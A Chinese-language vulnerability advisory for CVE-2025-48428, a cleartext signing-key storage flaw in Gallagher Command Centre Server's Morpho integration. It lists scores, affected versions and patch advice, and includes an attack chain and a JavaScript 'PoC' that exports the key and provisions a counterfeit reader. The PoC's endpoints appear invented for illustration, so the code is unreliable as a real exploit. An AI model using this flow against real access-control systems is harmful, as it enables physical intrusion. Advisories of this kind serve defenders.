CVE-2025-48428 Gallagher Command Centre 敏感信息明文存储漏洞

漏洞信息

漏洞编号

CVE-2025-48428

漏洞类型

敏感信息明文存储

CVSS评分

6.7 中危

攻击向量

本地 (AV:L)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Gallagher Command Centre Server

漏洞概述

CVE-2025-48428是Gallagher Command Centre Server中的一个敏感信息明文存储漏洞，编号为CWE-312。该漏洞存在于Gallagher Morpho集成功能中，可能允许经过认证的用户访问Command Centre Server，并导出正在使用的特定签名密钥。由于这些敏感信息以明文形式存储，攻击者获取密钥后可以部署被篡改或假冒的设备到该站点，从而对物理安全系统造成严重威胁。此漏洞需要攻击者具有较高的权限（高权限认证用户）才能利用，且攻击复杂度较低，无需用户交互即可实施。CVSS评分6.7，属于中等严重程度，但对具有高权限的攻击者来说，利用该漏洞可能导致严重的机密性、完整性和可用性损失。

技术细节

该漏洞源于Gallagher Command Centre Server的Morpho集成模块在处理签名密钥时未采用加密存储。具体技术细节包括：1) 签名密钥在存储过程中以明文形式保存在系统文件或数据库中；2) 攻击者需要具备对Command Centre Server的认证访问权限；3) 通过导出功能，攻击者可以获取正在使用的签名密钥；4) 获取密钥后，攻击者可伪造或篡改设备身份验证信息；5) 成功利用后，攻击者能够部署假冒或恶意设备到受保护站点，绕过物理安全控制。此漏洞影响多个版本的Command Centre Server，包括9.20、9.10、9.00及8.90和更早版本。攻击向量为本地访问（AV:L），需要高权限（PR:H），不影响用户交互（UI:N），对机密性、完整性和可用性均有高影响（C:H/I:H/A:H）。

攻击链分析

STEP 1

步骤1

攻击者获取Gallagher Command Centre Server的高权限用户账户凭证

STEP 2

步骤2

使用凭证登录Command Centre Server系统

STEP 3

步骤3

导航至Morpho集成模块，利用明文存储漏洞导出正在使用的签名密钥

STEP 4

步骤4

获取明文签名密钥后，攻击者创建伪造或篡改的设备

STEP 5

步骤5

使用窃取的密钥对假冒设备进行签名认证

STEP 6

步骤6

将假冒设备部署到目标站点，绕过物理安全控制

STEP 7

步骤7

攻击者可通过假冒设备进行未授权访问、数据窃取或破坏物理安全系统

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-48428 PoC - 敏感信息明文存储漏洞利用概念验证
// 注意：此PoC仅用于安全研究和授权测试

// 假设已获取高权限用户凭证
const credentials = {
  username: "admin",
  password: "password",
  server: "target-gallagher-server"
};

// 1. 认证访问Command Centre Server
function authenticate(credentials) {
  const session = sendRequest('POST', '/api/auth/login', {
    username: credentials.username,
    password: credentials.password
  });
  return session.token;
}

// 2. 访问Morpho集成模块并导出签名密钥
function exportSigningKey(sessionToken) {
  // 漏洞点：签名密钥以明文形式存储，可直接导出
  const response = sendRequest('GET', '/api/morpho/keys/export', {
    Authorization: `Bearer ${sessionToken}`,
    keyId: 'active-signing-key'
  });
  
  // 返回明文密钥
  return response.keyData; // 敏感信息明文存储
}

// 3. 使用导出的密钥部署假冒设备
function deployCounterfeitDevice(keyData) {
  const maliciousDevice = {
    serialNumber: "FAKE-SERIAL-001",
    signingKey: keyData, // 使用窃取的明文密钥
    type: "morpho-reader"
  };
  
  sendRequest('POST', '/api/devices/provision', maliciousDevice);
}

// 主程序
const token = authenticate(credentials);
const signingKey = exportSigningKey(token);
console.log("Exported signing key:", signingKey);
deployCounterfeitDevice(signingKey);

// 修复建议：实施加密存储和访问控制
function secureKeyStorage() {
  // 1. 使用AES-256加密敏感密钥
  // 2. 实施基于角色的访问控制(RBAC)
  // 3. 审计所有密钥访问日志
  // 4. 启用硬件安全模块(HSM)存储
}

影响范围

Gallagher Command Centre Server 9.20 < vEL9.20.2819 (MR4)

Gallagher Command Centre Server 9.10 < vEL9.10.3672 (MR7)

Gallagher Command Centre Server 9.00 < vEL9.00.3831 (MR8)

Gallagher Command Centre Server 8.90及所有更早版本

防御指南

临时缓解措施

目前官方已发布安全更新修复此漏洞。建议所有受影响用户立即升级到Command Centre Server 9.20 vEL9.20.2819 (MR4)、9.10 vEL9.10.3672 (MR7)或9.00 vEL9.00.3831 (MR8)及更高版本。对于无法立即升级的系统，应限制对Command Centre Server的访问，仅允许受信任的管理员访问，并加强监控和审计以检测潜在的恶意活动。同时，建议审查Morpho集成配置，确保敏感密钥存储在安全环境中。